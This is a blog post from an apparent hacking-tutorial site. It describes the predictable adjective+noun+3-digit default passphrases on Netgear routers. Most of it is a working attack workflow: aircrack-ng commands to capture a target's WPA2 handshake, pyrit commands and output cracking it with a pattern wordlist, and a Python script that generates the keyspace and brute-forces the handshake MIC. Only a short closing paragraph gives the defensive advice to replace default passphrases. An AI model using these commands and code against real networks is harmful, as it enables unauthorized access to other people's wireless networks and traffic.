metalkey

Hacking tutorials + info

Netgear Wireless Router Default Passphrase Vulnerability

July 01, 2016 — metalkey

OS: Debian 8

A vulnerability exists in the default passphrase printed on the label of Netgear wireless routers (example label: http://support1.gearguy.com/useruploads/images/19915v3.PNG). The factory passphrase is two dictionary words, an adjective followed by a noun, followed by a three digit number:
word1word2xxx

Because both words are drawn from fixed lists, the whole keyspace is only (number of adjectives) × (number of nouns) × 1000 passphrases, small enough to enumerate in full and crack offline from a single captured handshake. To exploit this you will need “aircrack-ng”, “pyrit” and a wordlist containing every possible passphrase. Initially, I was going to generate the dictionary from /usr/share/dict/cracklib-small with “crunch”, but a ready-made Netgear dictionary is already available for download from ScriptKitty (http://www.scriptkitty.ca/index.php/wordlists/).

Installation of Required Software

Manual step-by-step instructions @ blackMORE Ops (http://www.blackmoreops.com/2014/03/13/install-nvidia-driver-kernel-module-cuda-and-pyrit-kali-linux/)

user@debian8:~$ sudo apt-get install aircrack-ng
user@debian8:~$ sudo apt-get install pyrit

Step 1 – Capturing the Handshake

Plug in your Alfa AWUS036H (any adapter that supports monitor mode will do) and capture the 4-way handshake. The handshake is only exchanged when a client associates, so wait for a client to connect or reconnect; airodump-ng prints "WPA handshake: <BSSID>" in its top line once it has captured one.
Tutorial @ SecurityTube - http://www.securitytube.net/groups?operation=view&groupId=9

user@debian8:~$ sudo airmon-ng start wlan0
user@debian8:~$ sudo airodump-ng mon0
user@debian8:~$ sudo airodump-ng -c 1 -w netgear --bssid 00:11:22:33:44:55 mon0

Use whatever monitor interface name airmon-ng reports (mon0 here). Note that -w takes a filename prefix, so the capture is written to netgear-01.cap.

Step 2 – Cracking the Capture

Confirm you have usable handshakes (pyrit analyze should list at least one as "good"), then strip everything but the handshake out of the capture and run the dictionary through attack_passthrough.

user@debian8:~$ pyrit -r netgear-01.cap analyze
user@debian8:~$ pyrit -r netgear-01.cap -o stripped-netgear.cap strip
user@debian8:~$ pyrit -r stripped-netgear.cap -i adjective_noun_3d.txt -b 00:11:22:33:44:55 attack_passthrough
...
Parsing file 'stripped-netgear.cap' (1/1)...
Parsed 10 packets (10 802.11-packets), got 1 AP(s)
Tried 12235614 PMKs so far; 25683 PMKs per second.
The password is 'magicalsquash835'
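As an added example (this is not code from the original post, nor pyrit's own code), the Python script below shows both halves of the attack at once: it generates the adjective+noun+3-digit candidate list the dictionary is built from, and then does per candidate exactly what attack_passthrough does with each line of the wordlist: PBKDF2 the passphrase and SSID into the PMK, expand PMK plus MACs and nonces into the PTK, and recompute the EAPOL MIC of message 2 until one matches the captured MIC. The handshake it cracks is constructed inside the script (SSID NETGEAR99, made-up MAC addresses and nonces, a stub message 2 with no RSN IE) so that it runs without a capture file; the two tiny word lists are also constructed stand-ins for the real adjective and noun lists.

```python
import hashlib
import hmac
import itertools

# Constructed stand-ins for the adjective and noun lists behind
# adjective_noun_3d.txt; the real lists are far longer.
ADJECTIVES = ["magical", "happy", "tiny"]
NOUNS = ["squash", "river", "stone"]


def keyspace_size(adjectives=ADJECTIVES, nouns=NOUNS):
    """Number of passphrases in the scheme: every adjective x noun x 000..999."""
    return len(adjectives) * len(nouns) * 1000


def netgear_candidates(adjectives=ADJECTIVES, nouns=NOUNS):
    """Yield every adjective+noun+3-digit passphrase, e.g. 'magicalsquash835'."""
    for adj, noun in itertools.product(adjectives, nouns):
        for n in range(1000):
            yield f"{adj}{noun}{n:03d}"


def pmk(passphrase, ssid):
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key, label, data):
    """802.11i PRF-512: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return out[:64]


def ptk(pmk_bytes, ap_mac, sta_mac, anonce, snonce):
    """PTK from the PMK plus the two MACs and two nonces seen in the handshake.
    CCMP only needs PRF-384, but the KCK is the first 16 bytes either way."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk_bytes, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame):
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame)[:16].
    The frame's own 16-byte MIC field must be zeroed before hashing."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def build_msg2(snonce):
    """A minimal EAPOL-Key message 2 of 4 (constructed, MIC field zeroed)."""
    body = (b"\x02"                     # descriptor type: RSN (WPA2)
            + b"\x01\x0a"               # key info: version 2, pairwise, MIC bit set
            + b"\x00\x00"               # key length
            + b"\x00" * 7 + b"\x01"     # replay counter
            + snonce                    # SNonce
            + b"\x00" * 16              # key IV
            + b"\x00" * 8               # key RSC
            + b"\x00" * 8               # key ID
            + b"\x00" * 16              # MIC, zeroed for the computation
            + b"\x00\x00")              # key data length (no RSN IE in this stub)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def constructed_handshake(secret="magicalsquash835", ssid="NETGEAR99"):
    """Build a self-consistent handshake the way a router and client would:
    the MIC is derived from the secret, which the cracker must then recover.
    SSID, MAC addresses and nonces are made up for this example."""
    ap = bytes.fromhex("001122334455")
    sta = bytes.fromhex("66778899aabb")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    eapol = build_msg2(snonce)
    kck = ptk(pmk(secret, ssid), ap, sta, anonce, snonce)[:16]
    return {"ssid": ssid, "ap": ap, "sta": sta, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(kck, eapol)}


def crack(hs, candidates):
    """What attack_passthrough does per word: PMK -> PTK -> KCK -> MIC.
    Returns the first passphrase whose MIC matches the captured one, else None."""
    for pw in candidates:
        kck = ptk(pmk(pw, hs["ssid"]), hs["ap"], hs["sta"],
                  hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return pw
    return None


if __name__ == "__main__":
    print("keyspace:", keyspace_size())
    print("recovered:", crack(constructed_handshake(), netgear_candidates()))
```

The PBKDF2 step is the expensive one (4096 HMAC-SHA1 rounds per candidate), which is why pyrit pushes it to the GPU; everything after the PMK is cheap, so a precomputed PMK table for a given SSID turns the attack into a lookup. The MIC comparison uses hmac.compare_digest out of habit; on an offline capture timing does not matter.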

Solution

Never keep the default passphrase printed on the router. A passphrase built from a predictable pattern is recoverable offline from a single captured handshake no matter how long it looks, so choose a long, random passphrase that does not follow any dictionary pattern.

Tags: wifi